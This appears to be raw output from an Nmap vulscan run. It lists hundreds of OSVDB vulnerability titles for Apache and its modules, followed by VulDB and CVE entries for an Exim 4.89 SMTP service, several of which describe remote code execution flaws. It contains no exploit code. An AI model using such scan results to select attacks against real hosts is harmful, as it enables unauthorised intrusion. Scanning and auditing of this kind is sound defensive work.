| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
| [51151] Apache Roller Search Function q Parameter XSS
| [50482] PHP with Apache php_value Order Unspecified Issue
| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
| [47096] Oracle Weblogic Apache Connector POST Request Overflow
| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
| [43452] Apache Tomcat HTTP Request Smuggling
| [43309] Apache Geronimo LoginModule Login Method Bypass
| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
| [42091] Apache Maven Site Plugin Installation Permission Weakness
| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
| [40262] Apache HTTP Server mod_status refresh XSS
| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
16669| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
16670| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
16671| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
16672| [36080] Apache Tomcat JSP Examples Crafted URI XSS
16673| [36079] Apache Tomcat Manager Uploaded Filename XSS
16674| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
16675| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
16676| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
16677| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
16678| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
16679| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
16680| [34881] Apache Tomcat Malformed Accept-Language Header XSS
16681| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
16682| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
16683| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
16684| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
16685| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
16686| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
16687| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
16688| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
16689| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
16690| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
16691| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
16692| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
16693| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
16694| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
16695| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
16696| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
16697| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
16698| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
16699| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
16700| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
16701| [32724] Apache mod_python _filter_read Freed Memory Disclosure
16702| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
16703| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
16704| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
16705| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
16706| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
16707| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
16708| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
16709| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
16710| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
16711| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
16712| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
16713| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
16714| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
16715| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
16716| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
16717| [24365] Apache Struts Multiple Function Error Message XSS
16718| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
16719| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
16720| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
16721| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
16722| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
16723| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
16724| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
16725| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
16726| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
16727| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
16728| [22459] Apache Geronimo Error Page XSS
16729| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
16730| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
16731| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
16732| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
16733| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
16734| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
16735| [21021] Apache Struts Error Message XSS
16736| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
16737| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
16738| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
16739| [20439] Apache Tomcat Directory Listing Saturation DoS
16740| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
16741| [20285] Apache HTTP Server Log File Control Character Injection
16742| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
16743| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
16744| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
16745| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
16746| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
16747| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
16748| [19821] Apache Tomcat Malformed Post Request Information Disclosure
16749| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
16750| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
16751| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
16752| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
16753| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
16754| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
16755| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
16756| [18233] Apache HTTP Server htdigest user Variable Overfow
16757| [17738] Apache HTTP Server HTTP Request Smuggling
16758| [16586] Apache HTTP Server Win32 GET Overflow DoS
16759| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
16760| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
16761| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
16762| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
16763| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
16764| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
16765| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
16766| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
16767| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
16768| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
16769| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
16770| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
16771| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
16772| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
16773| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
16774| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
16775| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
16776| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
16777| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
16778| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
16779| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
16780| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
16781| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
16782| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
16783| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
16784| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
16785| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
16786| [13304] Apache Tomcat realPath.jsp Path Disclosure
16787| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
16788| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
16789| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
16790| [12848] Apache HTTP Server htdigest realm Variable Overflow
16791| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
16792| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
16793| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
16794| [12557] Apache HTTP Server prefork MPM accept Error DoS
16795| [12233] Apache Tomcat MS-DOS Device Name Request DoS
16796| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
16797| [12231] Apache Tomcat web.xml Arbitrary File Access
16798| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
16799| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
16800| [12178] Apache Jakarta Lucene results.jsp XSS
16801| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
16802| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
16803| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
16804| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
16805| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
16806| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
16807| [10471] Apache Xerces-C++ XML Parser DoS
16808| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
16809| [10068] Apache HTTP Server htpasswd Local Overflow
16810| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
16811| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
16812| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
16813| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
16814| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
16815| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
16816| [9717] Apache HTTP Server mod_cookies Cookie Overflow
16817| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
16818| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
16819| [9714] Apache Authentication Module Threaded MPM DoS
16820| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
16821| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
16822| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
16823| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
16824| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
16825| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
16826| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
16827| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
16828| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
16829| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
16830| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
16831| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
16832| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
16833| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
16834| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
16835| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
16836| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
16837| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
16838| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
16839| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
16840| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
16841| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
16842| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
16843| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
16844| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
16845| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
16846| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
16847| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
16848| [9208] Apache Tomcat .jsp Encoded Newline XSS
16849| [9204] Apache Tomcat ROOT Application XSS
16850| [9203] Apache Tomcat examples Application XSS
16851| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
16852| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
16853| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
16854| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
16855| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
16856| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
16857| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
16858| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
16859| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
16860| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
16861| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
16862| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
16863| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
16864| [7611] Apache HTTP Server mod_alias Local Overflow
16865| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
16866| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
16867| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
16868| [6882] Apache mod_python Malformed Query String Variant DoS
16869| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
16870| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
16871| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
16872| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
16873| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
16874| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
16875| [5526] Apache Tomcat Long .JSP URI Path Disclosure
16876| [5278] Apache Tomcat web.xml Restriction Bypass
16877| [5051] Apache Tomcat Null Character DoS
16878| [4973] Apache Tomcat servlet Mapping XSS
16879| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
16880| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
16881| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
16882| [4568] mod_survey For Apache ENV Tags SQL Injection
16883| [4553] Apache HTTP Server ApacheBench Overflow DoS
16884| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
16885| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
16886| [4383] Apache HTTP Server Socket Race Condition DoS
16887| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
16888| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
16889| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
16890| [4231] Apache Cocoon Error Page Server Path Disclosure
16891| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
16892| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
16893| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
16894| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
16895| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
16896| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
16897| [3322] mod_php for Apache HTTP Server Process Hijack
16898| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
16899| [2885] Apache mod_python Malformed Query String DoS
16900| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
16901| [2733] Apache HTTP Server mod_rewrite Local Overflow
16902| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
16903| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
16904| [2149] Apache::Gallery Privilege Escalation
16905| [2107] Apache HTTP Server mod_ssl Host: Header XSS
16906| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
16907| [1833] Apache HTTP Server Multiple Slash GET Request DoS
16908| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
16909| [872] Apache Tomcat Multiple Default Accounts
16910| [862] Apache HTTP Server SSI Error Page XSS
16911| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
16912| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
16913| [845] Apache Tomcat MSDOS Device XSS
16914| [844] Apache Tomcat Java Servlet Error Page XSS
16915| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
16916| [838] Apache HTTP Server Chunked Encoding Remote Overflow
16917| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
16918| [775] Apache mod_python Module Importing Privilege Function Execution
16919| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
16920| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
16921| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
16922| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
16923| [637] Apache HTTP Server UserDir Directive Username Enumeration
16924| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
16925| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
16926| [562] Apache HTTP Server mod_info /server-info Information Disclosure
16927| [561] Apache Web Servers mod_status /server-status Information Disclosure
16928| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
16929| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
16930| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
16931| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
16932| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
16933| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
16934| [376] Apache Tomcat contextAdmin Arbitrary File Access
16935| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
16936| [222] Apache HTTP Server test-cgi Arbitrary File Access
16937| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
16938| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
16939|_
465/tcp open ssl/smtp syn-ack Exim smtpd 4.89_1
16941| vulscan: VulDB - https://vuldb.com:
16942| [109969] Exim 4.88/4.89 SMTP Daemon receive.c bdat_getc denial of service
16943| [109968] Exim 4.88/4.89 SMTP Daemon receive.c receive_msg memory corruption
16944| [94599] Exim up to 4.87 information disclosure
16945| [13422] Exim 4.82 Mail Header dmarc.c expand_string() memory corruption
16946| [6817] Exim up to 4.80 src/dkim.c dkim_exim_query_dns_txt() memory corruption
16947| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
16948| [58841] exim up to 4.69 dkim_exim_verify_finish memory corruption
16949| [57462] Exim up to 4.75 Filesystem memory corruption
16950| [4280] Exim Server 4.x open_log() race condition
16951|
16952| MITRE CVE - https://cve.mitre.org:
16953| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
16954| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
16955| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
16956| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
16957| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
16958| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
16959| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
16960| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
16961| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
16962| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
16963| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
16964| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
